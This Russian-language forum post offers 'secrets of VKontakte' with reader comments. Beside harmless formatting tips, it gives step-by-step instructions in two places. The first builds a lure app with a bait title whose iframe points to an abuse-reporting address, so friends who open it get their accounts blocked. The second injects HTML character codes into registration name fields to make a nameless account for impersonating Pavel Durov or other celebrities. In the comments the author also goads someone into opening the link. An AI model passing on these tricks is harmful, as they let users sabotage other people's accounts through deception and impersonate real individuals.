Секреты и хитрости вконтакте!

Авторизация

• Автор

[spoiler=просмотр фоток заблок. пользователей!]Что то Вконтакте часто начали блокировать страницы, иногда даже их фотографии не успеваю просмотреть. Сегодня я расскажу Вам как смотреть фотографии заблокированных пользователей. Сразу говорю, у всех это не получится, так как Вам понадобится телефон на андроиде.

Приступаем:

1. Устанавливаем на свой андроид смартфон приложение для Вконтакте.
    2. Заходим на заблокированную страничку где хотите просмотреть фотографии.
    3. Сверху, где написано "Страница" "Фотографии", жмем на "Фотографии".
    4. Дальше выбираем альбомы и смотрим
    5. Вот и всё. Таким образом вы можете не только просматривать фотографии, но и ставить на них "мне нравится". Если на странице нажать на собачку, то появится фотография которая была до заморозки.
      [/spoiler]

[spoiler=Блокировка друзей]Хороший прикол над друзьями. Сейчас расскажу Вам Как заблокировать друга в контакте. На самом деле всё просто, Вам понадобиться лишь капелька мозга
    Итак приступаем:

1. Создаём приложение. (для этого прокручиваем страницу до самого "дна", переходим по ссылке разработчикам, дальше в верхнем правом углу тыкаем на создать приложение)
    2. Название можете дать любое, но лучше что-то типа "Сыграть с Анной Семенович", "Убить Гуфа"(ну чтоб ваш друг наверняка запустил приложение)
    3. Дальше нажимаем перейти к загрузке приложения и соглашаемся с правилами
    4. Переходим в настройки приложения, дальше ставим такие настройки:
      Состояние: приложение включено и видно всем
      Установка приложения: Требуется
      Права доступа: запрашивать доступ к стенке и заметкам
      Тип приложения выбираем "Iframe". В адрес Iframe вставляем ссылку:http://abuse.jino.ru/ (по ссылке не переходи!)
      Всё это сохраняем и кидаем ссылку приложения друзьям. Ну вот, теперь вы знаете Как заблокировать друга в контакте и можете смело над ним прикольнуться
      Совсем забыл: не заходите в приложение ! иначе сами будете заблокированы.
      p.s. если приложение типа не грузится и пишет загрузка приложения то так и должно быть! [/spoiler]

[spoiler=Как взломать Павла Дурова или комментируем от его имени]Ну, это не совсем взлом страницы Павла Дурова, да и взломать его нереально наверное. Сегодня я расскажу вам как писать от имени Павла Дурова или от имени любой знаменитости. Приступаем к выполнению:
    Для начала нам нужно зарегистрировать безимянку(страницу без имени и фамилии, а его мы сможем зарегистрировать только по приглашению. Для этого со своей станицы перейдите в раздел мои друзья, затем жмите на кнопку справа "Пригласить друга" или перейдите по этой ссылке: http://vk.com/invite. В поле имя и фамилия вводите один из следующих кодов:
    Первый код: & #013; - без пробела
    или Второй код: &# 00000013 - без пробела
    или Третий код: &# 00000030; (без пробела между # и 0)
    Дальше вводим мобильный телефон и регистрируемся. ВНИМАНИЕ! После первого входа на страницу у вас может быть no name или что-то в этом подобное, его можно исправить один раз. Когда зайдете в первый раз, у вас выйдут поля для заполнения анкеты, в поле фамилия и имя так же вводим эти коды:
    Первый код: &# 00000013 - без пробела
    или второй код: &# 00000030; (без пробела между # и 0)
    Теперь жмем готово. Всё, бызимянка у нас готова. Дальше самое легкое.
    Ставим аватарку к примеру Павла Дурова.
    Дальше переходим на страничку перед кем хотим прикольнуться, например у другу или на своей же странице. На стене пишем следующее:
    Первая строчка: *id1
    Вторую строчку лучше оставить пустой
    На третей строчке пишем сообщение которое хотели бы видеть
    Вот и всё [/spoiler]

[spoiler=Жирный текст вконтакте!]В самой социальной сети простым пользователям жирным шрифтом нельзя, но мы придумали как писать жирным шрифтом в сообщениях вконтакте.
    Действуем по инструкции:

1. Заходим на страницу пользователя кому хотим написать
    2. Нажимаем отправить сообщение на его странице.
    3. В графе Тема пишем сообщение, которое вы хотите сделать жирным. Например: Здравствуйте.
    4. В самом сообщение пишем код пустоты, то есть этот код: 
 без _
    5. Вы оба в шоке [/spoiler]

[spoiler=ссылка вконтакте в тексте!]А знаете ли Вы, что Вконтакте можно сделать ссылку в тексте?
    Лично мне бесит, когда читаю что нибудь в своих новостях с групп и снизу неполного текста есть надпись "читать далее", при нажатии перебрасывает куда то не туда.
    Хотите делать такие же ссылки? Делюсь секретом как сделать ссылку вконтакте.
    В самой социальной сети html коды не работают, лишь некоторые bb-коды.
    Как сделать ссылку на страницу пользователя: [id пользователя|тест ссылки]
    Пример: [id11111|Денис]
    Как сделать ссылку на группу: [номер группы|текст ссылки]
    Пример: [club1|ВКонтакте API]
    Как сделать ссылку на страницу публичной страницы: [номер публ. страницы|текст ссылки]
    Пример: [public111111|Приколы про Жириновского]
    Важно! Ссылки получатся лишь тогда, когда в первом поле вводите id, а не буквенный адрес.
    К примеру неправильный вариант: [vk.com/vkontakte|Денис]
    Приавильный вариант: [id1111|Денис] [/spoiler]

• с зизмо спи..ли

• Баянище

• Автор

Sergey, я вам блин помочь хочу! какой бан в ж***?

• с зисмо спер

• Влом читать:(:((

• а на сколько блок ?

• А можно не создавать страничку новую, а просто изменить имя фамилию и ввести коды, для взлома Павла дурова?

• Автор

Vladislav Pyatnishin, всмысле?

Добавлено через 00:49 мин.
    Babka, может и можно...сам пока что не пробывал!

• хХСерый СтражХх, ну через приложение на сколько можно заблокировать?

• Да мне лень читать))))

• Автор

id135744116, тогда хотябы + поставь если уж за старания благодаришь...

Добавлено через 00:31 мин.
    Vladislav Pyatnishin, сам не знаю...

• хХСерый СтражХх, а вдруг не работает :):

• спасибо !

• Автор

Vladislav Pyatnishin, перейди по ссылке, посмотрим!:): :): :):

Авторизация